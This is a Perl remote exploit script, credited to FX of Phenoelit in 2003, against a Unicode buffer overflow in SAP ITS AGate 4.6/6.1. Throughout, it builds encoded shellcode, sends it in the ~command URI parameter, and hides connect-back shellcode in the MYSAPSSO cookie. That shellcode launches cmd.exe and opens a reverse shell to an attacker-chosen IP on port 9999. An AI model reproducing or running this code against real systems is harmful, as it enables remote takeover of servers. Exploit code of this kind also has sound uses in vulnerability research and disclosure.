#!/usr/bin/perl -w
use IO::Socket;

# ~command Unicode overflow in LoggPrintf() of SAPagate.dll
# (required command mode to be allowed)
#
# FX of Phenoelit <fx@phenoelit.de>
# Dec 2003
#

$|=1;

if ($#ARGV != 2) {
        print "Usage: $0 <target_ip> <target_port> <back_connect_ip>\n";
        exit 1;
} else {
        ($host,$port,$myself)=@ARGV;
}

print   "        * * *  SAP ITS AGate 4.6/6.1 remote  * * *\n".
        " --==]] Phenoelit - http://www.phenoelit.de/whatSAP/ [[==--\n".
        "                       by FX - 2003\n\n";


# adjust if required ;)
$padding="";

$shellcode=
"\x57\x6e\x58\x6e\x05\x06\x4c\x6e".
"\x2d\x01\x4c\x6e\x50\x6e\x59\x6e".
"\x68\x01\x01\x6e\x58\x6e\x2d\x1a".
"\x01\x6e\x43\x21\x6e\x41\x6e\x41".
"\x6e\x05\x18\x01\x6e\x43\x21\x6e".
"\x41\x6e\x41\x6e\x43\x21\x6e\x41".
"\x6e\x05\x5e\x01\x6e\x43\x21\x6e".
"\x41\x6e\x43\x21\x6e\x41\x6e\x2d".
"\x72\x01\x6e\x43\x21\x6e\x41\x6e".
"\x2d\x6b\x01\x6e\x43\x21\x6e\x41".
"\x6e\x05\x43\x01\x6e\x43\x21\x6e".
"\x41\x6e\x41\x6e\x41\x6e\x05\x3c".
"\x01\x6e\x43\x21\x6e\x41\x6e\x41".
"\x6e\x05\x7f\x01\x6e\x05\x02\x01".
"\x6e\x43\x21\x6e\x41\x6e\x05\x6b".
"\x01\x6e\x43\x21\x6e\x41\x6e\x41".
"\x6e\x41\x6e\x05\x14\x01\x6e\x43".
"\x21\x6e\x41\x6e\x41\x6e\x2d\x41".
"\x01\x6e\x43\x21\x6e\x41\x6e\x41".
"\x6e\x05\x41\x01\x6e\x43\x21\x6e".
"\x41\x6e\x41\x6e\x41\x6e\x05\x61".
"\x01\x6e\x43\x21\x6e\x41\x6e\x41".
"\x6e\x05\x04\x01\x6e\x43\x21\x6e".
"\x41\x6e\x2d\x66\x01\x6e\x43\x21".
"\x6e\x41\x6e\x05\x37\x01\x6e\x43".
"\x21\x6e\x41\x6e\x2d\x36\x01\x6e".
"\x43\x21\x6e\x41\x6e\x41\x6e\x43".
"\x21\x6e\x41\x6e\x41\x6e\x41\x6e".
"\x2d\x76\x01\x6e\x43\x21\x6e\x41".
"\x6e\x41\x6e\x41\x6e\x05\x76\x01".
"\x6e\x43\x21\x6e\x41\x6e\x41\x6e".
"\x43\x21\x6e\x41\x6e\x2d\x76\x01".
"\x6e\x43\x21\x6e\x41\x6e\x43\x21".
"\x6e\x41\x6e\x2d\x08\x01\x6e\x43".
"\x21\x6e\x41\x6e\x41\x6e\x2d\x1c".
"\x01\x6e\x43\x21\x6e\x41\x6e\x41".
"\x6e\x2d\x34\x01\x6e\x43\x21\x6e".
"\x41\x6e\x41\x6e\x05\x43\x01\x6e".
"\x43\x21\x6e\x41\x6e\x41\x6e\x2d".
"\x2e\x01\x6e\x43\x21\x6e\x41\x6e".
"\x2d\x5c\x01\x6e\x43\x21\x6e\x41".
"\x6e\x05\x0b\x01\x6e\x43\x21\x6e".
"\x41\x6e\x41\x6e\x05\x51\x01\x6e".
"\x43\x21\x6e\x41\x6e\x41\x6e\x43".
"\x21\x6e\x41\x6e\x2d\x48\x01\x6e".
"\x43\x21\x6e\x41\x6e\x2d\x18\x01".
"\x6e\x43\x21\x6e\x41\x6e\x2d\x5c".
"\x01\x6e\x43\x21\x6e\x41\x6e\x2d".
"\x26\x01\x6e\x43\x21\x6e\x41\x6e".
"\x41\x6e\x2d\x5c\x01\x6e\x43\x21".
"\x6e\x41\x6e\x41\x6e\x2d\x79\x01".
"\x6e\x43\x21\x6e\x41\x6e\x41\x6e".
"\x41\x6e\x05\x70\x01\x6e\x43\x21".
"\x6e\x41\x6e\x41\x6e\x43\x21\x6e".
"\x41\x6e\x2d\x7e\x01\x6e\x43\x21".
"\x6e\x41\x6e\x43\x21\x6e\x41\x6e".
"\x2d\x7d\x01\x6e\x43\x21\x6e\x41".
"\x6e\x2d\x05\x01\x6e\x43\x21\x6e".
"\x41\x6e\x41\x6e\x43\x21\x6e\x41".
"\x6e\x05\x62\x01\x6e\x43\x21\x6e".
"\x41\x6e\x43\x21\x6e\x41\x6e\x05".
"\x66\x01\x6e\x43\x21\x6e\x41\x6e".
"\x05\x38\x01\x6e\x43\x21\x6e\x41".
"\x6e\x41\x6e\x41\x6e\x41\x6e\x2d".
"\x15\x01\x6e\x43\x21\x6e\x41\x6e".
"\x2d\x27\x01\x6e\x43\x21\x6e\x41".
"\x6e\x43\x21\x6e\x41\x6e\x2d\x46".
"\x01\x6e\x43\x21\x6e\x41\x6e\x43".
"\x21\x6e\x41\x6e\x2d\x5a\x01\x6e".
"\x43\x21\x6e\x41\x6e\x41\x6e\x05".
"\x5f\x01\x6e\x43\x21\x6e\x41\x6e".
"\x41\x6e\x05\x5a\x01\x6e\x43\x21".
"\x6e\x41\x6e\x41\x26\x26\x26\x26".
"\x26\x26\x26\x26\x26\x26\x26\x26".
"\x26\x26\x26\x26\x26\x26\x26\x26".
"\x26\x26\x26\x26\x26\x26\x26\x26".
"\x26\x26\x26\x26\x26\x26\x26\x26".
"\x26\x26\x26\x26\x26\x26\x26\x26".
"\x26\x26\x26\x26\x26\x26\x26\x26".
"\x26\x26\x26\x26\x26\x26\x26\x6e".
"\x01\x01\x01\x2c\x01\x3c\x01\x01".
"\x05\x01\x01\x01\x05\x53\x01\x01".
"\x01\x64\x25\x01\x01\x75\x3e\x6c".
"\x74\x03\x01\x46\x46\x01\x01\x24".
"\x64\x05\x01\x01\x43\x01\x01\x20".
"\x01\x01\x01\x28\x6e\x6b\x14\x5e".
"\x58\x50\x50\x50\x50\x50\x50\x50".
"\x50\x55\x5d\x58\x59\x5e\x5b\x58".
"\x51\x5c\x53\x53\x5c\x50\x50\x50".
"\x50\x50\x50\x58\x51\x5e\x5b\x50".
"\x55\x50\x50\x50\x50\x50\x50\x5b".
"\x5f\x50\x50\x50\x50\x50\x50\x50".
"\x55\x56\x50\x55\x53\x56\x54\x5f".
"\x5f\x53\x55\x50\x50\x50\x50\x50".
"\x50\x50\x50\x56\x54\x58\x59\x52".
"\x55\x50\x50\x50\x50\x50\x50\x50".
"\x50\x58\x59\x5f\x5e\x58\x51\x53".
"\x5e\x56\x55\x56\x5c\x53\x51\x57".
"\x54\x57\x54\x50\x53\x54\x56\x5e".
"\x5b\x5f\x55\x54\x56\x54\x56\x54".
"\x56\x54\x56\x5f\x5f\x5e\x56\x58".
"\x5b\x56\x54\x52\x54\x50\x58\x56".
"\x54\x58\x5f\x50\x55\x50\x50\x50".
"\x50\x50\x50\x50\x50\x58\x51\x5c".
"\x54\x50\x54\x50\x50\x50\x50\x50".
"\x50\x56\x51\x58\x51\x5c\x57\x50".
"\x50\x50\x50\x50\x51\x50\x50\x5e".
"\x5b\x5c\x53";



die "Shellcode too long!\n" if (length($shellcode)>953);

$cc="";
for ($i=0;$i<length($shellcode);$i++) {
	$char=substr($shellcode,$i,1);
	$cc.=sprintf("%%%02X",ord($char));
}
$cc.= "A" x (953 - length($shellcode));
$cc.=$padding;
# Use this for ITS 6.1
$cc.= "\x23\x97"x20;
# Use this for ITS 4.6 
# $cc.= "\x42\x24"x20;

$URI="/scripts/wgate/?~command=".$cc;

########### 

$myself=~/([0-9]+)\.([0-9]+)\.([0-9]+)\.([0-9]+)/;
$conback=sprintf("%c%c%c%c",$1,$2,$3,$4);
printf("Connecting back to %d.%d.%d.%d:9999\n",$1,$2,$3,$4);

$sso=
"\xeb\x25\x27\x0f".$conback."\x02\x06\x6c\x59\x6c\x59\xf8\x1d".
"\x9c\xde\x8c\xd1\x4c\x70\xd4\x03\x58\x46\x57\x53\x32\x5f\x33\x32".
"\x2e\x44\x4c\x4c\x01\xeb\x05\xe8\xf9\xff\xff\xff\x5d\x83\xed\x2c".
"\x6a\x30\x59\x64\x8b\x01\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x78\x08".
"\x8d\x5f\x3c\x8b\x1b\x01\xfb\x8b\x5b\x78\x01\xfb\x8b\x4b\x1c\x01".
"\xf9\x8b\x53\x24\x01\xfa\x53\x51\x52\x8b\x5b\x20\x01\xfb\x31\xc9".
"\x41\x31\xc0\x99\x8b\x34\x8b\x01\xfe\xac\x31\xc2\xd1\xe2\x84\xc0".
"\x75\xf7\x0f\xb6\x45\x09\x8d\x44\x45\x08\x66\x39\x10\x75\xe1\x66".
"\x31\x10\x5a\x58\x5e\x56\x50\x52\x2b\x4e\x10\x41\x0f\xb7\x0c\x4a".
"\x8b\x04\x88\x01\xf8\x0f\xb6\x4d\x09\x89\x44\x8d\xd8\xfe\x4d\x09".
"\x75\xbe\xfe\x4d\x08\x74\x17\xfe\x4d\x24\x8d\x5d\x1a\x53\xff\xd0".
"\x89\xc7\x6a\x02\x58\x88\x45\x09\x80\x45\x79\x0c\xeb\x82\x89\xce".
"\x31\xdb\x53\x53\x53\x53\x56\x46\x56\xff\xd0\x89\xc7\x55\x58\x66".
"\x89\x30\x6a\x10\x55\x57\xff\x55\xe0\x8d\x45\x88\x50\xff\x55\xe8".
"\x55\x55\xff\x55\xec\x8d\x44\x05\x0c\x94\x53\x68\x2e\x65\x78\x65".
"\x68\x5c\x63\x6d\x64\x94\x31\xd2\x8d\x45\xcc\x94\x57\x57\x57\x53".
"\x53\xfe\xca\x01\xf2\x52\x94\x8d\x45\x78\x50\x8d\x45\x88\x50\xb1".
"\x08\x53\x53\x6a\x10\xfe\xce\x52\x53\x53\x53\x55\xff\x55\xf0\x6a".
"\xff\xff\x55\xe4".
"Just here to see if there are any 0x00 chars";

$request = "GET ".$URI." HTTP/1.0\r\n".
	"Host: ".$host."\r\n".
	"Accept: text/html, text/plain, application/pdf, image/*, ".
		"image/jpeg, text/sgml, video/mpeg, image/jpeg, ".
		"image/tiff, image/x-rgb, image/png, image/x-xbitmap,".
		" image/x-xbm, image/gif, application/postscript, */*;q=0.01\r\n".
	"Accept-Encoding: gzip, compress\r\n".
	"Accept-Language: en\r\n".
	"Pragma: no-cache\r\n".
	"Cache-Control: no-cache\r\n".
	"User-Agent: Phenoelit SAP Exploit code\r\n".
	"Referer: http://www.phenoelit.de/\r\n".
	"Cookie: MYSAPSSO=el1t".$sso."\r\n".
	"\r\n";

	&send_HTTP($host,$port);

exit 0;

#
# SUB
#

sub send_HTTP {
    my $remote;
    my $rline;
    my $dest;
    my $port;

    ($dest,$port) = @_;

    $remote =
      IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>$dest,PeerPort=>"$port",);

    unless ($remote) { die "cannot connect to http daemon on $dest" }

    $remote->autoflush(1);
    print $remote $request;

    while ( $rline=<$remote> ) { 
	print $rline;
    }

    close $remote;
}